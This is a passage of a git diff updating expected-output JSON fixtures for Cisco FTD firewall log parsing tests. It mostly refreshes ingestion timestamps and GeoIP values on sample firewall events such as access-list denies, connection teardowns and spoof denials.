Protocol: 6, IngressInterface: outside, EgressInterface: inside, IngressZone: output-zone, EgressZone: input-zone, Priority: 3, GID: 1, SID: 13360, Revision: 6, Message: APP-DETECT failed FTP login attempt, Classification: Misc Activity, User: No Authentication Required, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-no-type-id.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-no-type-id.log-expected.json index afa0d5ae42a..4949fb372bb 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-no-type-id.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-no-type-id.log-expected.json @@ -17,13 +17,13 @@ "ip": "10.1.123.45" }, "message": "Intrusion attempt", - "tags": [ - "preserve_original_event" - ], "network": { "application": "webserver", "protocol": "http" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "beats", "product": "asa", @@ -48,7 +48,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:10.150747700Z", + "ingested": "2021-12-14T14:40:05.183238356Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: ApplicationProtocol: http, Client: webserver, DstIP: 10.8.12.47, SrcIP: 10.1.123.45, Message: Intrusion attempt", "code": "430001", "kind": "alert", @@ -109,7 +109,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:10.150757400Z", + "ingested": "2021-12-14T14:40:05.183241267Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: HTTPResponse: 404, Message: Some message here (1:36330:2).", "code": "430001", "kind": "alert", @@ -167,7 +167,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:10.150763900Z", + "ingested": "2021-12-14T14:40:05.183241695Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: HTTPResponse: 404, Message: Some message here (1:36330:2), Empty: ,FileCount:, IngressZone:", "code": "430002", "kind": "event", @@ -243,7 +243,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:10.150770Z", + "ingested": "2021-12-14T14:40:05.183242107Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: %ASA-3-430005 Message: This one has a type id, HTTPResponse: 404, Message: And two messages, SrcIP: 127.0.0.1, DstIP: 192.168.3.33, SrcPort: 512, DstPort: 64311", "code": "430005", "kind": "alert", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json index e61077af9b2..e782bb3ba29 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json @@ -7,20 +7,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -73,7 +67,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.569363700Z", + "ingested": "2021-12-14T14:40:05.595628970Z", "original": "\u003c165\u003eOct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.168.2.244(27218) -\u003e OUTSIDE/81.2.69.144(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", "code": "106100", "kind": "event", @@ -138,7 +132,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.569371900Z", + "ingested": "2021-12-14T14:40:05.595631635Z", "original": "Jan 1 2020 10:42:53 localhost : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr mydomain.example.net/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -220,7 +214,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:10.569377300Z", + "ingested": "2021-12-14T14:40:05.595632101Z", "original": "Jan 2 2020 11:33:20 localhost : %ASA-4-338204: Dynamic filter dropped greylisted TCP traffic from eth0:10.10.10.1/1234 (source.example.net/11234) to wan:172.24.177.3/80 (www.example.org/80), destination malicious address resolved from dynamic list: example.org, threat-level: high, category: malware", "code": "338204", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json index df048d88373..b2f590a92b6 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json @@ -48,7 +48,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:10.982940200Z", + "ingested": "2021-12-14T14:40:06.019729035Z", "original": "Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", @@ -118,7 +118,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:10.982948100Z", + "ingested": "2021-12-14T14:40:06.019731519Z", "original": "Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", @@ -188,7 +188,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.982952400Z", + "ingested": "2021-12-14T14:40:06.019732027Z", "original": "Apr 15 2014 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -266,7 +266,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.982957300Z", + "ingested": "2021-12-14T14:40:06.019732429Z", "original": "Apr 24 2013 16:00:28 INT-FW01 : %FTD-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -\u003e outside/192.168.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0]", "code": "106100", "kind": "event", @@ -343,7 +343,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.982961300Z", + "ingested": "2021-12-14T14:40:06.019732814Z", "original": "Apr 24 2013 16:00:27 INT-FW01 : %FTD-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -\u003e outside/192.168.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0]", "code": "106100", "kind": "event", @@ -413,7 +413,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.982966100Z", + "ingested": "2021-12-14T14:40:06.019733194Z", "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.168.2.130/12834", "code": "305011", "kind": "event", @@ -484,7 +484,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.982970800Z", + "ingested": "2021-12-14T14:40:06.019733576Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743274 for outside:192.168.2.43/443 (192.168.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834)", "code": "302013", "kind": "event", @@ -556,7 +556,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.982975200Z", + "ingested": "2021-12-14T14:40:06.019733966Z", "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.168.2.130/25882", "code": "305011", "kind": "event", @@ -631,7 +631,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.982979800Z", + "ingested": "2021-12-14T14:40:06.019734352Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302015: Built outbound UDP connection 89743275 for outside:192.168.2.222/53 (192.168.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882)", "code": "302015", "kind": "event", @@ -703,7 +703,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.982985400Z", + "ingested": "2021-12-14T14:40:06.019735496Z", "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.168.2.130/45392", "code": "305011", "kind": "event", @@ -776,7 +776,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.982989800Z", + "ingested": "2021-12-14T14:40:06.019735914Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743276 for outside:192.168.2.1/80 (192.168.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392)", "code": "302013", "kind": "event", @@ -850,7 +850,7 @@ "event": { "severity": 6, "duration": 5025000000000, - "ingested": "2021-12-09T13:35:10.982994800Z", + "ingested": "2021-12-14T14:40:06.019736497Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 89743275 for outside:192.168.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140", "code": "302016", "kind": "event", @@ -923,7 +923,7 @@ "event": { "severity": 6, "duration": 36000000000000, - "ingested": "2021-12-09T13:35:10.983000700Z", + "ingested": "2021-12-14T14:40:06.019736882Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 666 for outside:192.168.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999", "code": "302016", "kind": "event", @@ -991,7 +991,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.983041400Z", + "ingested": "2021-12-14T14:40:06.019737292Z", "original": "Jun 04 2011 21:59:52 FJSG2NRFW01 : %FTD-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr 192.168.132.46/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -1058,7 +1058,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.983045400Z", + "ingested": "2021-12-14T14:40:06.019737677Z", "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.168.0.130/10879", "code": "305011", "kind": "event", @@ -1131,7 +1131,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.983049400Z", + "ingested": "2021-12-14T14:40:06.019738074Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743277 for outside:192.168.0.17/80 (192.168.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879)", "code": "302013", "kind": "event", @@ -1195,7 +1195,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:10.983053600Z", + "ingested": "2021-12-14T14:40:06.019738591Z", "original": "Apr 30 2013 09:22:33: %FTD-2-106007: Deny inbound UDP from 192.168.0.66/12981 to 10.1.2.60/53 due to DNS Query", "code": "106007", "kind": "event", @@ -1261,7 +1261,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983057300Z", + "ingested": "2021-12-14T14:40:06.019738981Z", "original": "Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1331,7 +1331,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983062Z", + "ingested": "2021-12-14T14:40:06.019739387Z", "original": "Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1401,7 +1401,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983067500Z", + "ingested": "2021-12-14T14:40:06.019739771Z", "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1471,7 +1471,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983071Z", + "ingested": "2021-12-14T14:40:06.019740167Z", "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1541,7 +1541,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983075700Z", + "ingested": "2021-12-14T14:40:06.019740558Z", "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1611,7 +1611,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983081Z", + "ingested": "2021-12-14T14:40:06.019740953Z", "original": "Apr 30 2013 09:22:40: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1681,7 +1681,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983085900Z", + "ingested": "2021-12-14T14:40:06.019741477Z", "original": "Apr 30 2013 09:22:41: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1751,7 +1751,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983089800Z", + "ingested": "2021-12-14T14:40:06.019741887Z", "original": "Apr 30 2013 09:22:47: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1821,7 +1821,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983094600Z", + "ingested": "2021-12-14T14:40:06.019742274Z", "original": "Apr 30 2013 09:22:48: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.13(43013) -\u003e dmz/192.168.33.31(25) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1891,7 +1891,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983100300Z", + "ingested": "2021-12-14T14:40:06.019742658Z", "original": "Apr 30 2013 09:22:56: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1957,7 +1957,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:10.983104800Z", + "ingested": "2021-12-14T14:40:06.019743045Z", "original": "Apr 30 2013 09:23:02: %FTD-2-106006: Deny inbound UDP from 192.168.2.66/137 to 10.1.2.42/137 on interface inside", "code": "106006", "kind": "event", @@ -2017,7 +2017,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:10.983108400Z", + "ingested": "2021-12-14T14:40:06.019743432Z", "original": "Apr 30 2013 09:23:03: %FTD-2-106007: Deny inbound UDP from 192.168.2.66/12981 to 10.1.5.60/53 due to DNS Query", "code": "106007", "kind": "event", @@ -2083,7 +2083,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983112900Z", + "ingested": "2021-12-14T14:40:06.019743814Z", "original": "Apr 30 2013 09:23:06: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2153,7 +2153,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983117Z", + "ingested": "2021-12-14T14:40:06.019744194Z", "original": "Apr 30 2013 09:23:08: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2223,7 +2223,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983121900Z", + "ingested": "2021-12-14T14:40:06.019744581Z", "original": "Apr 30 2013 09:23:15: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2293,7 +2293,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983127900Z", + "ingested": "2021-12-14T14:40:06.019745034Z", "original": "Apr 30 2013 09:23:24: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2363,7 +2363,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983133700Z", + "ingested": "2021-12-14T14:40:06.019745411Z", "original": "Apr 30 2013 09:23:34: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2433,7 +2433,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:10.983139500Z", + "ingested": "2021-12-14T14:40:06.019745882Z", "original": "Apr 30 2013 09:23:40: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", @@ -2503,7 +2503,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:10.983145200Z", + "ingested": "2021-12-14T14:40:06.019746283Z", "original": "Apr 30 2013 09:23:41: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", @@ -2573,7 +2573,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983150900Z", + "ingested": "2021-12-14T14:40:06.019746685Z", "original": "Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2643,7 +2643,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983155200Z", + "ingested": "2021-12-14T14:40:06.019747073Z", "original": "Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2713,7 +2713,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983158800Z", + "ingested": "2021-12-14T14:40:06.019747460Z", "original": "Apr 15 2018 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -\u003e outside/192.168.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2792,7 +2792,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.983163200Z", + "ingested": "2021-12-14T14:40:06.019747850Z", "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-6-302015: Built outbound UDP connection 447235 for outside:192.168.77.12/11180 (192.168.77.12/11180) to identity:10.0.13.13/80 (10.0.13.13/80)", "code": "302015", "kind": "event", @@ -2871,7 +2871,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:10.983168900Z", + "ingested": "2021-12-14T14:40:06.019748319Z", "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", @@ -2948,7 +2948,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:10.983173900Z", + "ingested": "2021-12-14T14:40:06.019748702Z", "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", @@ -3026,7 +3026,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.983177900Z", + "ingested": "2021-12-14T14:40:06.019749096Z", "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", @@ -3106,7 +3106,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.983182900Z", + "ingested": "2021-12-14T14:40:06.019749509Z", "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", @@ -3188,7 +3188,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:35:10.983186900Z", + "ingested": "2021-12-14T14:40:06.019749884Z", "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", "code": "302014", "kind": "event", @@ -3269,7 +3269,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-12-09T13:35:10.983191Z", + "ingested": "2021-12-14T14:40:06.019750328Z", "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", @@ -3350,7 +3350,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-12-09T13:35:10.983195300Z", + "ingested": "2021-12-14T14:40:06.019750729Z", "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", @@ -3423,7 +3423,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.983199300Z", + "ingested": "2021-12-14T14:40:06.019751124Z", "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", @@ -3493,7 +3493,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.983203800Z", + "ingested": "2021-12-14T14:40:06.019751508Z", "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", @@ -3568,7 +3568,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:10.983209100Z", + "ingested": "2021-12-14T14:40:06.019751886Z", "original": "Dec 11 2018 08:01:39 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.168.0.12/5000 by access-group \"dmz\" [0x123a465e, 0x8c20f21]", "code": "106023", "kind": "event", @@ -3646,7 +3646,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.983214200Z", + "ingested": "2021-12-14T14:40:06.019752391Z", "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", @@ -3726,7 +3726,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.983218100Z", + "ingested": "2021-12-14T14:40:06.019752774Z", "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", @@ -3808,7 +3808,7 @@ "severity": 6, "duration": 86399000000000, "reason": "TCP FINs", - "ingested": "2021-12-09T13:35:10.983225100Z", + "ingested": "2021-12-14T14:40:06.019753157Z", "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447237 for outside:192.168.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs", "code": "302014", "kind": "event", @@ -3881,7 +3881,7 @@ "event": { "severity": 6, "duration": 122000000000, - "ingested": "2021-12-09T13:35:10.983229900Z", + "ingested": "2021-12-14T14:40:06.019753550Z", "original": "Aug 15 2012 23:30:09: %FTD-6-302016: Teardown UDP connection 40 for outside:10.44.4.4/500 to inside:10.44.2.2/500 duration 0:02:02 bytes 1416", "code": "302016", "kind": "event", @@ -3948,7 +3948,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:10.983233900Z", + "ingested": "2021-12-14T14:40:06.019753938Z", "original": "Sep 12 2014 06:50:53 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4012,7 +4012,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:10.983238Z", + "ingested": "2021-12-14T14:40:06.019754326Z", "original": "Sep 12 2014 06:51:01 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4076,7 +4076,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:10.983241500Z", + "ingested": "2021-12-14T14:40:06.019754730Z", "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4140,7 +4140,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:10.983246100Z", + "ingested": "2021-12-14T14:40:06.019755127Z", "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4204,7 +4204,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:10.983249900Z", + "ingested": "2021-12-14T14:40:06.019755519Z", "original": "Sep 12 2014 06:51:06 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4268,7 +4268,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:10.983254600Z", + "ingested": "2021-12-14T14:40:06.019755900Z", "original": "Sep 12 2014 06:51:17 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4332,7 +4332,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:10.983260400Z", + "ingested": "2021-12-14T14:40:06.019756279Z", "original": "Sep 12 2014 06:52:48 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4396,7 +4396,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:10.983266Z", + "ingested": "2021-12-14T14:40:06.019756670Z", "original": "Sep 12 2014 06:53:00 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4471,7 +4471,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:10.983271800Z", + "ingested": "2021-12-14T14:40:06.019757058Z", "original": "Sep 12 2014 06:53:01 GIFRCHN01 : %FTD-4-106023: Deny tcp src outside:192.168.2.95/24069 dst inside:10.32.112.125/25 by access-group \"PERMIT_IN\" [0x0, 0x0]\"", "code": "106023", "kind": "event", @@ -4536,7 +4536,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:10.983277600Z", + "ingested": "2021-12-14T14:40:06.019757452Z", "original": "Sep 12 2014 06:53:02 GIFRCHN01 : %FTD-3-313001: Denied ICMP type=3, code=3 from 10.2.3.5 on interface Outside", "code": "313001", "kind": "event", @@ -4599,7 +4599,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:10.983283300Z", + "ingested": "2021-12-14T14:40:06.019757837Z", "original": "Jan 14 2015 13:16:13: %FTD-4-313004: Denied ICMP type=0, from laddr 172.16.30.2 on interface inside to 172.16.1.10: no matching session", "code": "313004", 